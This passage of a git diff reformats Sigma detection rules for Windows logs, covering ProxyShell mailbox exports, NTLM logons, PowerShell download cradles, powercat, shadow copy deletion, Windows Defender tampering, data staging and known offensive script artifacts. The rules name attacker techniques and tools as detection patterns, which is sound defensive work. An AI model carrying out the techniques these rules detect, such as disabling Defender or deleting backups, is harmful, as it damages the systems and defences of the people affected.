Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems) @@ -23,7 +21,7 @@ detection: - New-MailboxExportRequest - ' -Mailbox ' export_params: - - -FilePath "\\\\ + - -FilePath "\\\\ # We care about any share location. - .aspx role_assignment: '|all': diff --git a/sigma/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml b/sigma/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml index 946cfba8b..e7eaf15f0 100644 --- a/sigma/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml +++ b/sigma/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml @@ -1,8 +1,7 @@ title: Remove Exported Mailbox from Exchange Webserver id: 09570ae5-889e-43ea-aac0-0e1221fb3d95 status: test -description: Detects removal of an exported Exchange mailbox which could be to cover - tracks from ProxyShell exploit +description: Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit references: - https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430 author: Christian Burkard (Nextron Systems) diff --git a/sigma/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml b/sigma/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml index 846b68cb6..4f0dcfbe6 100644 --- a/sigma/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml +++ b/sigma/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml @@ -1,8 +1,7 @@ title: Exchange Set OabVirtualDirectory ExternalUrl Property id: 9db37458-4df2-46a5-95ab-307e7f29e675 status: test -description: Rule to detect an adversary setting OabVirtualDirectory External URL - property to a script in Exchange Management log +description: Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log references: - https://twitter.com/OTR_Community/status/1371053369071132675 author: Jose Rodriguez @Cyb3rPandaH diff --git a/sigma/builtin/msexchange/win_exchange_transportagent.yml b/sigma/builtin/msexchange/win_exchange_transportagent.yml index a7340d9e3..e63790992 100644 --- a/sigma/builtin/msexchange/win_exchange_transportagent.yml +++ b/sigma/builtin/msexchange/win_exchange_transportagent.yml @@ -1,8 +1,8 @@ title: MSExchange Transport Agent Installation - Builtin id: 4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6 related: - - id: 83809e84-4475-4b69-bc3e-4aad8568612f - type: derived + - id: 83809e84-4475-4b69-bc3e-4aad8568612f + type: derived status: test description: Detects the Installation of a Exchange Transport Agent references: @@ -25,7 +25,6 @@ detection: fields: - AssemblyPath falsepositives: - - Legitimate installations of exchange TransportAgents. AssemblyPath is a good - indicator for this. + - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. level: medium ruletype: Sigma diff --git a/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml b/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml index a6f2b3f03..e9f0f1fcb 100644 --- a/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml +++ b/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml @@ -13,6 +13,7 @@ tags: logsource: service: msexchange-management product: windows + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: msexchange_management: Channel: MSExchange Management @@ -23,7 +24,6 @@ detection: fields: - AssemblyPath falsepositives: - - Legitimate installations of exchange TransportAgents. AssemblyPath is a good - indicator for this. + - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. level: high ruletype: Sigma diff --git a/sigma/builtin/ntlm/win_susp_ntlm_auth.yml b/sigma/builtin/ntlm/win_susp_ntlm_auth.yml index 9534a89f9..a492efb29 100644 --- a/sigma/builtin/ntlm/win_susp_ntlm_auth.yml +++ b/sigma/builtin/ntlm/win_susp_ntlm_auth.yml @@ -1,8 +1,7 @@ title: NTLM Logon id: 98c3bcf1-56f2-49dc-9d8d-c66cf190238b status: test -description: Detects logons using NTLM, which could be caused by a legacy source or - attackers +description: Detects logons using NTLM, which could be caused by a legacy source or attackers references: - https://twitter.com/JohnLaTwC/status/1004895028995477505 - https://goo.gl/PsqrhT @@ -21,7 +20,7 @@ detection: Channel: Microsoft-Windows-NTLM/Operational selection: EventID: 8002 - ProcessName|contains: '*' + ProcessName|contains: '*' # We use this to avoid false positives with ID 8002 on other log sources if the logsource isn't set correctly condition: ntlm and selection falsepositives: - Legacy hosts diff --git a/sigma/builtin/ntlm/win_susp_ntlm_rdp.yml b/sigma/builtin/ntlm/win_susp_ntlm_rdp.yml index 2cccd4027..4c4d8618d 100644 --- a/sigma/builtin/ntlm/win_susp_ntlm_rdp.yml +++ b/sigma/builtin/ntlm/win_susp_ntlm_rdp.yml @@ -1,8 +1,7 @@ title: Potential Remote Desktop Connection to Non-Domain Host id: ce5678bb-b9aa-4fb5-be4b-e57f686256ad status: test -description: Detects logons using NTLM to hosts that are potentially not part of the - domain. +description: Detects logons using NTLM to hosts that are potentially not part of the domain. references: - n/a author: James Pemberton diff --git a/sigma/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml b/sigma/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml index 9af9445cc..eaeba31a3 100644 --- a/sigma/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml +++ b/sigma/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml @@ -1,8 +1,7 @@ title: OpenSSH Server Listening On Socket id: 3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781 status: test -description: Detects scenarios where an attacker enables the OpenSSH server and server - starts to listening on SSH socket. +description: Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket. references: - https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH - https://winaero.com/enable-openssh-server-windows-10/ diff --git a/sigma/builtin/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml b/sigma/builtin/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml index e9fe3b5cb..d797a018b 100644 --- a/sigma/builtin/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml +++ b/sigma/builtin/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'echo ' - '%userdomain%' condition: process_creation and selection diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml index 97a11e91a..513134746 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml @@ -1,11 +1,10 @@ title: Nslookup PowerShell Download Cradle id: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 related: - - id: 1b3b01c7-84e9-4072-86e5-fc285a41ff23 - type: similar + - id: 1b3b01c7-84e9-4072-86e5-fc285a41ff23 + type: similar status: test -description: Detects a powershell download cradle using nslookup. This cradle uses - nslookup to extract payloads from DNS records. +description: Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records. references: - https://twitter.com/Alh4zr3d/status/1566489367232651264 author: Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml index 3dfd06713..7367c58d9 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml @@ -27,7 +27,6 @@ detection: - Remove-WmiObject condition: ps_classic_start and selection falsepositives: - - Legitimate Administrator deletes Shadow Copies using operating systems utilities - for legitimate reason + - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason level: high ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_downgrade_attack.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_downgrade_attack.yml index be9fb3d77..02cf64630 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_downgrade_attack.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_downgrade_attack.yml @@ -1,8 +1,7 @@ title: PowerShell Downgrade Attack - PowerShell id: 6331d09b-4785-4c13-980f-f96661356249 status: test -description: Detects PowerShell downgrade attack by comparing the host versions with - the actually used engine version 2.0 +description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 references: - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ author: Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements) diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_exe_calling_ps.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_exe_calling_ps.yml index c0ebb4a65..fca9f019a 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_exe_calling_ps.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_exe_calling_ps.yml @@ -1,8 +1,7 @@ title: PowerShell Called from an Executable Version Mismatch id: c70e019b-1479-4b65-b0cc-cd0c6093a599 status: test -description: Detects PowerShell called from an executable by the version mismatch - method +description: Detects PowerShell called from an executable by the version mismatch method references: - https://adsecurity.org/?p=2921 author: Sean Metcalf (source), Florian Roth (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_powercat.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_powercat.yml index 657b339a2..539f5400e 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_powercat.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_powercat.yml @@ -1,11 +1,10 @@ title: Netcat The Powershell Version id: c5b20776-639a-49bf-94c7-84f912b91c15 related: - - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 - type: derived + - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 + type: derived status: test -description: Adversaries may use a non-application layer protocol for communication - between host and C2 server or among infected hosts within a network +description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ - https://github.com/besimorhino/powercat diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_remote_powershell_session.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_remote_powershell_session.yml index f2b100951..0c391bf5c 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_remote_powershell_session.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_remote_powershell_session.yml @@ -1,8 +1,8 @@ title: Remote PowerShell Session (PS Classic) id: 60167e5c-84b2-4c95-a7ac-86281f27c445 related: - - id: 96b9f619-aa91-478f-bacb-c3e50f8df575 - type: derived + - id: 96b9f619-aa91-478f-bacb-c3e50f8df575 + type: derived status: test description: Detects remote PowerShell sessions references: @@ -29,5 +29,6 @@ detection: condition: ps_classic_start and selection falsepositives: - Legitimate use remote PowerShell sessions +# Note: Increase the level to "medium" in environments that do not leverage PowerShell remoting level: low ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml index 6fdf25fac..5fffd170b 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml @@ -1,17 +1,14 @@ title: Potential RemoteFXvGPUDisablement.EXE Abuse id: f65e22f9-819e-4f96-9c7b-498364ae7a25 related: - - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 - type: similar - - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 - type: similar - - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 - type: similar + - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation + type: similar + - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module + type: similar + - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock + type: similar status: test -description: Detects PowerShell module creation where the module Contents are set - to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential - abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable - to module load-order hijacking. +description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 @@ -29,8 +26,7 @@ detection: powershell_classic: Channel: Windows PowerShell selection: - Data|contains: ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter - { + Data|contains: ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter { condition: powershell_classic and selection falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_renamed_powershell.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_renamed_powershell.yml index 4de246c05..3538f3d78 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_renamed_powershell.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_renamed_powershell.yml @@ -19,11 +19,13 @@ detection: Channel: Windows PowerShell selection: Data|contains: HostName=ConsoleHost + # Note: Powershell Logging Data is localized. Meaning that "HostApplication" field will be translated to a different field on a non english layout. This rule doesn't take this into account due to the sheer ammount of possibilities. It's up to the user to add these cases. filter_main_ps: Data|contains: - HostApplication=powershell - HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell - HostApplication=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell + # In some cases powershell was invoked with inverted slashes - HostApplication=C:/Windows/System32/WindowsPowerShell/v1.0/powershell - HostApplication=C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell condition: ps_classic_start and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_susp_download.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_susp_download.yml index fbf0ce474..ec38f3c39 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_susp_download.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_susp_download.yml @@ -1,8 +1,8 @@ title: Suspicious PowerShell Download id: 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d related: - - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 - type: derived + - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 + type: derived status: test description: Detects suspicious PowerShell download command references: diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml index bf6b6da7f..e347f9813 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml @@ -1,9 +1,7 @@ title: Use Get-NetTCPConnection id: b366adb4-d63d-422d-8a2c-186463b5ded0 status: test -description: Adversaries may attempt to get a listing of network connections to or - from the compromised system they are currently accessing or from remote systems - by querying for information over the network. +description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell author: frack113 diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_susp_zip_compress.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_susp_zip_compress.yml index af243f62d..43333995f 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_susp_zip_compress.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_susp_zip_compress.yml @@ -1,22 +1,16 @@ title: Zip A Folder With PowerShell For Staging In Temp - PowerShell -id: 71ff406e-b633-4989-96ec-bc49d825a412 +id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic related: - - id: daf7eb81-35fd-410d-9d7a-657837e602bb - type: similar - - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 - type: similar - - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 - type: similar + - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module + type: similar + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script + type: similar + - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation + type: similar status: test -description: 'Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet - in order to compress folders and files where the output is stored in a potentially - suspicious location that is used often by malware for exfiltration. - - An adversary might compress data (e.g., sensitive documents) that is collected - prior to exfiltration in order to make it portable and minimize the amount of - data sent over the network. - - ' +description: | + Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. + An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml index e073f82a1..2869d17ce 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml @@ -1,11 +1,10 @@ title: Tamper Windows Defender - PSClassic id: ec19ebab-72dc-40e1-9728-4c0b805d722c related: - - id: 14c71865-6cd3-44ae-adaa-1db923fae5f2 - type: similar + - id: 14c71865-6cd3-44ae-adaa-1db923fae5f2 + type: similar status: experimental -description: Attempting to disable scheduled scanning and other parts of Windows Defender - ATP or set default actions to allow. +description: Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -79,10 +78,8 @@ detection: - mtdefac Allow - SevereThreatDefaultAction Allow - stdefac Allow - condition: ps_classic_provider_start and (selection_set_mppreference and 1 of - selection_options_*) + condition: ps_classic_provider_start and (selection_set_mppreference and 1 of selection_options_*) falsepositives: - - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting - purposes. Must be investigated. + - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated. level: high ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml index 8c950bdfe..56b85a103 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml @@ -1,8 +1,7 @@ title: Suspicious Non PowerShell WSMAN COM Provider id: df9a0e0e-fedb-4d6c-8668-d765dfc92aa7 status: test -description: Detects suspicious use of the WSMAN provider without PowerShell.exe as - the host application. +description: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application. references: - https://twitter.com/chadtilbury/status/1275851297770610688 - https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/ @@ -28,6 +27,7 @@ detection: - HostApplication=powershell - HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell - HostApplication=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell + # In some cases powershell was invoked with inverted slashes - HostApplication=C:/Windows/System32/WindowsPowerShell/v1.0/powershell - HostApplication=C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell condition: powershell_classic and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_xor_commandline.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_xor_commandline.yml index b8061f402..cad284c6d 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_xor_commandline.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_xor_commandline.yml @@ -1,8 +1,7 @@ title: Suspicious XOR Encoded PowerShell Command Line - PowerShell id: 812837bb-b17f-45e9-8bd0-0ec35d2e3bd6 status: test -description: Detects suspicious powershell process which includes bxor command, alternative - obfuscation method to b64 encoded commands. +description: Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands. references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46 author: Teymur Kheirkhabarov, Harish Segar (rule) diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml b/sigma/builtin/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml index 502c1af63..355fa2573 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml @@ -1,13 +1,12 @@ title: Potential Active Directory Enumeration Using AD Module - PsModule id: 74176142-4684-4d8a-8b0a-713257e7df8e related: - - id: 70bc5215-526f-4477-963c-a47a5c9ebd12 - type: similar - - id: 9e620995-f2d8-4630-8430-4afd89f77604 - type: similar + - id: 70bc5215-526f-4477-963c-a47a5c9ebd12 + type: similar + - id: 9e620995-f2d8-4630-8430-4afd89f77604 + type: similar status: test -description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" - DLL. Which is often used by attackers to perform AD enumeration. +description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. references: - https://github.com/samratashok/ADModule - https://twitter.com/cyb3rops/status/1617108657166061568?s=20 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/sigma/builtin/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 61b6a3595..eb78bb57f 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml @@ -1,8 +1,7 @@ title: Alternate PowerShell Hosts - PowerShell Module id: 64e8e417-c19a-475a-8d19-98ea705394cc status: test -description: Detects alternate PowerShell hosts potentially bypassing detections looking - for powershell.exe +description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe references: - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html author: Roberto Rodriguez @Cyb3rWard0g @@ -24,17 +23,21 @@ detection: selection: ContextInfo|contains: '*' filter_powershell: + # This filter covers the following use cases + # - When powershell is called directly from commandline via keyword powershell or powershell.exe + # - Or called via path but not with full "".exe". Example: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell ContextInfo|contains: - - = powershell + - = powershell # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event - = C:\Windows\System32\WindowsPowerShell\v1.0\powershell - = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell + # In some cases powershell was invoked with inverted slashes - = C:/Windows/System32/WindowsPowerShell/v1.0/powershell - = C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell filter_sdiagnhost: - ContextInfo|contains: = C:\WINDOWS\System32\sdiagnhost.exe -Embedding + ContextInfo|contains: = C:\WINDOWS\System32\sdiagnhost.exe -Embedding # When MSDT is launched for example filter_citrix: ContextInfo|contains: ConfigSyncRun.exe - filter_adace: + filter_adace: # Active Directory Administrative Center Enhancements ContextInfo|contains: C:\Windows\system32\dsac.exe filter_winrm: ContextInfo|contains: C:\Windows\system32\wsmprovhost.exe -Embedding diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml b/sigma/builtin/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml index 0727f99ad..21fa9da13 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml @@ -1,18 +1,13 @@ title: Bad Opsec Powershell Code Artifacts id: 8d31a8ce-46b5-4dd6-bdc3-680931f1db86 related: - - id: 73e733cc-1ace-3212-a107-ff2523cc9fc3 - type: derived + - id: 73e733cc-1ace-3212-a107-ff2523cc9fc3 + type: derived status: test -description: 'focuses on trivial artifacts observed in variants of prevalent offensive - ps1 payloads, including - - Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other - attack payloads - +description: | + focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including + Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec. - - ' references: - https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/ - https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/ @@ -43,7 +38,6 @@ detection: - '0xdeadbeef' condition: ps_module and selection_4103 falsepositives: - - Moderate-to-low; Despite the shorter length/lower entropy for some of these, - because of high specificity, fp appears to be fairly limited in many environments. + - Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments. level: critical ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_clear_powershell_history.yml b/sigma/builtin/powershell/powershell_module/posh_pm_clear_powershell_history.yml index 714a57fd3..997f2cd7d 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_clear_powershell_history.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_clear_powershell_history.yml @@ -1,8 +1,8 @@ title: Clear PowerShell History - PowerShell Module id: f99276ad-d122-4989-a09a-d00904a5f9d2 related: - - id: dfba4ce1-e0ea-495f-986e-97140f31af2d - type: derived + - id: dfba4ce1-e0ea-495f-986e-97140f31af2d + type: derived status: test description: Detects keywords that could indicate clearing PowerShell history references: @@ -33,7 +33,7 @@ detection: selection_payload_2: Payload|contains|all: - Set-PSReadlineOption - - "\u2013HistorySaveStyle" + - –HistorySaveStyle # not sure if the homoglyph –/- is intended, just checking for both - SaveNothing selection_payload_3: Payload|contains|all: diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_decompress_commands.yml b/sigma/builtin/powershell/powershell_module/posh_pm_decompress_commands.yml index 7b294c85b..8cfc11dd0 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_decompress_commands.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_decompress_commands.yml @@ -1,11 +1,10 @@ title: PowerShell Decompress Commands id: 1ddc1472-8e52-4f7d-9f11-eab14fc171f5 related: - - id: 81fbdce6-ee49-485a-908d-1a728c5dcb09 - type: derived + - id: 81fbdce6-ee49-485a-908d-1a728c5dcb09 + type: derived status: test -description: A General detection for specific decompress commands in PowerShell logs. - This could be an adversary decompressing files. +description: A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/8 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_exploit_scripts.yml b/sigma/builtin/powershell/powershell_module/posh_pm_exploit_scripts.yml index 5a857275c..b642d46b0 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_exploit_scripts.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_exploit_scripts.yml @@ -1,13 +1,12 @@ title: Malicious PowerShell Scripts - PoshModule id: 41025fd7-0466-4650-a813-574aaacbe7f4 related: - - id: f331aa1f-8c53-4fc3-b083-cc159bc971cb - type: similar - - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 - type: obsoletes + - id: f331aa1f-8c53-4fc3-b083-cc159bc971cb + type: similar + - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 + type: obsoletes status: test -description: Detects the execution of known offensive powershell scripts used for - exploitation or reconnaissance +description: Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance references: - https://github.com/PowerShellMafia/PowerSploit - https://github.com/NetSPI/PowerUpSQL @@ -20,8 +19,8 @@ references: - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ + - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec + - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec - 